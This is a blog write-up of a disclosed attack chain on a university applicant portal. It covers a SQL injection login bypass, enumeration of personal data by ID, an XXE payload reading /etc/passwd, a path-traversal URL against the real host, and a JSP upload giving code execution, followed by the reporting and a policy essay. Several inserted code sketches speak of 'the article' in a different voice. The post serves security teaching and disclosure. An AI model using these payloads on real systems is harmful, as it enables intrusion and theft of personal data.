Hacking the University in a Few Steps

Escalating a Wrong Date to Get Code Execution

FHantke
12 min read · Apr 18, 2022
Picture: Josh Sorenson

A couple of weeks ago, a fresh cup of tea was waiting on my table as I was about to complete my application process to Saarland University. After my initial application was accepted, I was asked to upload some additional documents, such as my passport, to finish the process. For this, I was forwarded to an uploader platform where I was supposed to log in using my applicant ID and my birthday as the password. However, my birthday did not work, and I was denied a login. This is the story of how a wrong birth date led to code execution on a university server.

You Shall Not Pass?

After my birthday did not work as a password, I took a big sip from my tea and pondered the next steps. Eventually, I did what I always do when a website does not work for me: I analyzed the website’s traffic!

The login page asks for the applicant ID and the birthday.

The traffic shown below demonstrates that when I click the login button, the application sends a request to a loginBewerber endpoint containing the applicant’s ID in the URL and the birthday in the request body. The ID and the birthday are both user-provided inputs we can play with and try to manipulate. The first manipulation I tried was to bypass the date check with a typical SQL injection (SQLi): 01.02.1999"+OR+"1"="1. With this kind of attack, attackers abuse SQL syntax; in this case, the injected tautology makes the birthday check always evaluate to true, and I hoped the service would log me in. To my surprise, the attack worked on the first try, and the server’s answer was an XML document with lots of my personal information, like my address, gender, and birth date. Later, I also learned that the date check was only client-side, and any password returned the XML.
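The login call can be sketched as follows. Note that the host, the exact path layout, and the body field name are assumptions reconstructed from the traffic described above; only the loginBewerber endpoint name and the payload itself come from the article.

```python
# Hedged sketch of the login request carrying the SQLi payload.
# Host, path layout, and the body field name are assumptions; only the
# loginBewerber endpoint name and the payload come from the traffic above.

BASE = "https://uploader.example.invalid"  # placeholder, not the real host

def build_login_request(applicant_id: str, birthday: str) -> tuple:
    """Return (url, body) for the loginBewerber call."""
    url = f"{BASE}/loginBewerber/{applicant_id}"
    body = {"birthday": birthday}
    return url, body

# The tautology closes the date string and appends OR "1"="1", so a
# naive WHERE clause matches regardless of the stored birth date.
payload = '01.02.1999" OR "1"="1'
url, body = build_login_request("45678", payload)
```

As the article later notes, the server-side check was effectively absent, so any body would have worked; the tautology was only needed against the client-side check.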

The login request contains the applicant’s ID in the URL and the birthday in the request body.
The login request returns an XML with lots of personal information.

Quickly, I checked all the information in this XML and found the reason why my initial login attempt did not work: the administration had stored the wrong birth year for my account, unfortunately. At least the bypass worked flawlessly to retrieve the correct date and pass the login.

I Have a Bad Feeling About This

At that point, I was curious about what else this application had to offer. After all, I was asked to upload my passport to this service. Even without the authentication bypass, it felt uneasy to upload important documents to an application secured only by the applicant’s birthday. I mean, how long would it take to brute-force the birthday of an average student? But now, with the known vulnerability, the feeling was even worse.

This feeling was further confirmed when I looked at the applicant’s ID in the login URL. It takes no professional hacker to see that the applicant’s ID is just a regular number; in my example, 45678. What happens if I subtract one from the ID and send the request again? The answer came quickly, and I almost choked on my tea: another user’s personal information was shown on my screen.

My screen showed the information for applicant 45677, and the same request worked for every other ID as well. Although my real ID was not 45678, the number was in the same region. This means that the personal information of almost 50,000 applicants, such as home addresses and e-mail addresses, was freely accessible to anyone; something I, as a user of this platform, was not very happy about.
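This class of bug (an insecure direct object reference) can be sketched in a few lines; the host and URL layout are placeholders for illustration only, and nothing here should be run against a real system.

```python
# Sketch of the IDOR enumeration: because applicant IDs are sequential
# integers and the server never checks authorization, every ID yields a
# valid login URL. Host and path are placeholders, not the real service.

BASE = "https://uploader.example.invalid"

def candidate_urls(start_id: int, count: int) -> list:
    """Build login URLs for a range of sequential applicant IDs."""
    return [f"{BASE}/loginBewerber/{i}" for i in range(start_id, start_id + count)]

# Each URL, combined with the client-side-only date check, would expose
# one applicant's full XML record.
urls = candidate_urls(45677, 3)
```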

Time to Upload Some Documents

Now that I was able to log into my user account, I could have begun to upload the requested papers. However, it should not be a big surprise that I did not feel like uploading personal documents to this service. Nevertheless, my curiosity was piqued as I wanted to know how the upload functionality works. So I sent some test documents instead.

The traffic analysis revealed an exotic uploading process consisting of two requests. First, as shown below, a simple POST request is sent to upload a document. The example request below shows that the URL contains a file name and that the body holds the content. As soon as the first request is accepted, the server responds with plain text containing the path where it stored the document. Next, the client sends another request to link the uploaded file with the corresponding application. In the second example request below, we find the applicant’s ID in the URL and the file name from the previous request in the file_renamed parameter. Eventually, the service lists the uploaded document as part of the user’s application.
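The two-step flow can be sketched as follows. The host, the endpoint name of the first request, and all parameter names except file_renamed are assumptions reconstructed from the description above, not the real API.

```python
# Hedged sketch of the two-step upload. Only createUploadFile and the
# file_renamed parameter are named in the article; everything else here
# (host, query parameter names) is an assumption for illustration.

BASE = "https://uploader.example.invalid"

def build_upload_request(filename: str, content: bytes) -> tuple:
    """Step 1: POST the raw file content; the filename travels in the URL.
    The server replies in plain text with the path where it stored the file."""
    return f"{BASE}/upload?file={filename}&folder=uploads&sem=20221", content

def build_link_request(applicant_id: str, stored_path: str) -> tuple:
    """Step 2: link the stored file to the application via file_renamed."""
    url = f"{BASE}/createUploadFile/{applicant_id}"
    return url, {"file_renamed": stored_path}
```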

The upload request contains the filename and parts of the path in its URL.
The second part of the upload process sends a request to connect a file with the corresponding applicant.

I have seen similar upload processes before. Still, two aspects of this one caught my eye. The first is that the initial URL contains the file name and other parts of the path where the server stores the file. This can be seen by analyzing the URL parameters and comparing their values to the response text we get from the server: File saved as /data/uploader/uploads/20221/45678_2022_01_31_22_21_18_2_Passport_Hantke_Florian.pdf. What happens if we manipulate this path?

The second oddity is that the createUploadFile request returns an error message with an informative stack trace whenever the file_renamed parameter does not point to an existing file; crucial information we can use for further analysis! Let me take another sip of my tea and then we continue.

Beginning with the second request, the one that provided a stack trace, I considered various ways to escalate this flaw further. Not only does the stack trace reveal beneficial information, such as the structure of the source code, but it also echoes back the value of the file_renamed parameter. As the file_renamed parameter is part of an XML structure, the next attack I tried was an XML external entity (XXE) injection. This kind of attack abuses external entities in XML to send server-side requests or, as in our case, to load file contents or directory listings into the XML structure. As demonstrated in the request below, I defined the entity x to contain the file content of /etc/passwd. The server then uses this entity as the content of the file_renamed parameter. Since this content is not a valid file name, the server responds with an error message containing the invalid filename: the content of /etc/passwd. Consequently, we can read every directory and file the server’s user is permitted to access, not only standard Linux files but also the application’s source code and user-uploaded files.
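The payload looked roughly like the following reconstruction. The root element name is an assumption; only the external-entity trick and the file_renamed parameter come from the request described above.

```python
# Hedged reconstruction of the XXE payload. The <request> element name
# is an assumption; the external entity and the file_renamed usage
# mirror the attack described in the article.

XXE_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request [
  <!ENTITY x SYSTEM "file:///etc/passwd">
]>
<request>
  <file_renamed>&x;</file_renamed>
</request>"""

# A vulnerable parser expands &x; to the file content; since that is not
# a valid filename, the error message echoes /etc/passwd back to us.
```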

The upload request is vulnerable to XXE.
The vulnerable request returns the content of /etc/passwd inside of an error message.

Next, I continued analyzing the first oddity, the path parameters in the upload request. As previously mentioned, the server’s response reveals where the file was stored. With this hint, I quickly figured out that the endpoint is vulnerable to a path traversal attack. Path traversal attacks allow attackers to manipulate a path without the server validating it; in this case, it allowed me to store the uploaded file wherever I wanted on the server. But that was just the tip of the iceberg, as I discovered an even more devastating fact: the server never checked the file content or the file extension. The server was thus wide open to more critical kinds of exploits.
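The effect of the traversal can be illustrated with a few lines of path arithmetic. The upload directory comes from the server response quoted above; the webroot location is a hypothetical example.

```python
# Sketch of the path traversal in the upload filename: because ../
# segments are never stripped, the written file can escape the upload
# directory. The webroot path below is a hypothetical example.

from posixpath import normpath

UPLOAD_DIR = "/data/uploader/uploads/20221"   # from the server response
WEBROOT = "/opt/webapp/webroot"               # assumed webroot location

def resolved_path(filename: str) -> str:
    """Where the server would actually write the file (no validation)."""
    return normpath(f"{UPLOAD_DIR}/{filename}")

# Four ../ segments walk up out of the upload directory to the root,
# then back down into the (assumed) webroot:
evil = "../../../../opt/webapp/webroot/shell.jsp"
```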

Oops, Did I Execute Code?

While I was enjoying the last sip of my tea, I thought about ways to take advantage of the arbitrary file upload vulnerability. Of course, I could overwrite configuration files or upload HTML documents to trigger XSS. Yet, I had a better idea.

From the error message mentioned above, we know that the webserver is Java-based. Accordingly, I guessed it must be possible to execute JavaServer Pages (JSP) files. JSP allows web developers to write HTML code containing dynamic Java parts executed on the server side. This implies that an attacker who controls a JSP file loaded by the server can execute arbitrary code on the server side.

Since I had already found a way to upload an arbitrary file, I could also upload a JSP file. One question, however, remained: how do I bait the server into executing the file? Usually, to trigger a JSP file, its path must be opened in the browser. In this case, the initial upload directory was outside the webroot, which means I could not simply request the file path. Luckily, I could use the path traversal in the file upload request to store the file wherever I wanted, and thus also inside the web directory. Besides that, the application offered an even more straightforward way: a link vulnerable to path traversal that loads documents from arbitrary paths, https://www.lsf.uni-saarland.de/uploader/upload?file=../../../../etc/passwd&folder=uploads&sem=20221. In effect, I could freely load an uploaded JSP file and execute it.

To test my idea, the first (and only) JSP file I uploaded to the server was the beautifully and stealthily named 9187b2b784c12987bpnwoleivsal.jsp (see below). This was no 007 mission, however; it was just a test, a math function to prove that code execution works. Of course, it did work, and I was theoretically able to execute arbitrary code on the server. By now, you probably all know what this means: I could not only read all files users had uploaded, I could also try to escalate privileges further, get root and take over the server, or explore the university network from the inside. That was enough hacking for me, as I did not want to make anyone angry before my first day; it was time to start reporting.

The upload request does not check the file extension or content. This request uploads a JSP test file.
When the JSP file is loaded, the random number is generated on the server-side.
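A minimal probe in the spirit of the test file described above could look like this; the file name and exact content are illustrative, not the original file.

```python
# A minimal JSP probe, held here as a string to be uploaded. If the
# expression is evaluated, the Java code runs server-side; if the file
# is served as static text, the <%= ... %> markers come back verbatim.
# The content is illustrative, not the original test file.

JSP_PROBE = """<%@ page language="java" %>
<html><body>
  Server says: <%= new java.util.Random().nextInt(1000) %>
</body></html>"""
```

A fresh number on every page load, as in the screenshot above, confirms server-side execution.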

Reporting!

Before I start writing a report, I always go through the same mental exercise. I lean back and think about what potential profit a group of criminals would gain from discovering such security bugs and what the impact would be for the users and the organization. In this case, criminals could use the first discovered vulnerability to bypass the authentication check and log in as any user, even without a valid applicant account. Once they opened that door, they could upload a JSP file to open a reverse shell. At that point, they would have hit the jackpot: they could not only steal personal information from almost 50,000 people but also take over the entire application or even the server.

Given these clear facts, I wrote the vulnerability report the same evening and sent an email to the university’s data center the next day. I informed them about my findings, and shortly after, the application was offline; I was only greeted with a 403 page. Eventually, I received an email from the Hochschul-IT-Zentrum (hiz), telling me that they could confirm the findings and were looking into the problems. Furthermore, we had a friendly and informative phone call about the situation.

A day after the bugs were reported, the file uploader was not accessible anymore.

At the time of writing, the situation is still the same, and I still see the 403 page. However, I know that the hiz has been working on fixing the aforementioned issues and has already ordered a penetration test to check the application before taking it online again. Furthermore, the self-implemented service will be replaced by an established external product in the future to avoid similar problems.

A Profound Problem

Now, the reporting was done and the case was closed. I grabbed my teacup and walked into the kitchen, still thinking about this case and wondering how such fundamental security issues can keep existing. Sure, it is always easy to blame developers for their mistakes; however, in my opinion, the problem is more profound than someone writing bad code. The facts outlined in this article, as well as in many others (Zerforschung, CCC), show that IT security in Germany suffers from a general lack of understanding and continues to lag far behind. It is not solvable by cleaning up each and every application individually, like cleaning teacups again and again. In the long term, this cleaning procedure works astonishingly well for teacups but evidently not at all for applications.
It follows that this profound problem can only be solved politically! Arthur Wing Pinero once wrote: “In English society while there is tea there is hope”. I am convinced that this also applies to German society. As I am already brewing my next tea, I have hope that basic issues such as those addressed in this article will hardly exist in the future. Therefore, I want to use this last section to give my thoughts on how to improve IT security in Germany in general and how to foster a better understanding of this important matter.

As I said earlier, it is not only the developers’ fault when they write error-prone software. Often, the pressure of project deadlines causes developers to prioritize key features of their application over its security. For instance, during the COVID-19 pandemic, many companies wanted to be first on the market with a particular product or service and therefore may have neglected their product’s security (e.g., corona test centers). Competition in the industry is incredibly high due to the low cost of entry, product churn is ever more rapid, and the cost of missing out on a new trend far outweighs the cost of lousy software. A sentence from the IT security section of the current coalition agreement attempts to rein in this kind of wanton behavior: “manufacturers must be liable for damages negligently caused by IT security vulnerabilities in their products”. Reading this as an IT security guy sounds hopeful at first, but thinking more about it is disillusioning. The statement indicates that only in the worst case, if criminal hackers successfully attack an application and cause damage, can it become very costly for the manufacturer. In my opinion as an amateur enthusiast of law and politics, this way of thinking seems wrong and will inevitably cost the application’s users. If we always wait for the worst case, the damage has already happened. Of course, we also have the GDPR, but honestly, with my limited legal knowledge, I neither know whether the mere existence of a vulnerability is punishable, nor have I ever heard of such a precedent. I think the government needs to come up with strictly enforced and better-defined penalties for security vulnerabilities that are reported by independent security researchers, even before criminals begin to abuse them.

That said, bugs do not have to be found only by independent researchers or criminals. Companies can and should obviously check their own security as well. Additionally, they should rely on professional external penetration tests, as the tester often views the application from a different angle. In fact, frequent tests are already planned for government agencies, as stated in the IT security part of the coalition agreement. In my opinion, however, this should also include all public institutions, such as universities, because people trust them to be secure. Even more, it should include all companies operating in Germany.

Another aspect besides penetration testing is improving general IT security knowledge. Before developing software, people need to gain at least a basic understanding of security best practices in software development. As an illustration: before you can work as a cook, you need an official health certificate so that you know how not to poison your guests. Before you drive a truck for your company, you need a special license so that you do not crash your vehicle. Why don’t you need a developer license so that you do not poison the users of your application or crash your software? Although such licenses are not realistic for software development, security education is! IT security courses must be a crucial part of every IT education. Moreover, routine IT security training must be mandatory for every developer to reach lateral entrants and keep all developers up to date.

Finally, my last thought concerns another aspect of the coalition agreement: “Identifying, reporting and closing security vulnerabilities in a responsible process, e.g. in IT security research, should be legally feasible”. This is a very important point! Currently, looking for a vulnerability in an application is a legal gray area, even if your personal data is at risk. Luckily, I have not yet encountered any problems with this, and companies have always been happy about my reports. However, that is not always the case, as other examples highlight the mistreatment of security professionals as criminals. The fact that the legal aspects of vulnerability testing are not completely clear scares people away from looking into the products they use. More people would check products and report vulnerabilities if the process were well-defined and legal. We just witnessed a prime example of this: how is it that nearly 50,000 university students logged in to an upload portal (that already looks fishy) without anyone finding or reporting these elementary issues? Responsible vulnerability research is a public service, and it must be legalized!

With this last statement, I hope you agree that something must change in our education and our legal institutions to create a more secure internet and world. Thank you for reading. Now, get a cup of tea and a bit of hope for the rest of your day.

https://twitter.com/fh4ntke

Written by FHantke
Computer Science Student. Interested in IT security and forensics. https://fhantke.de/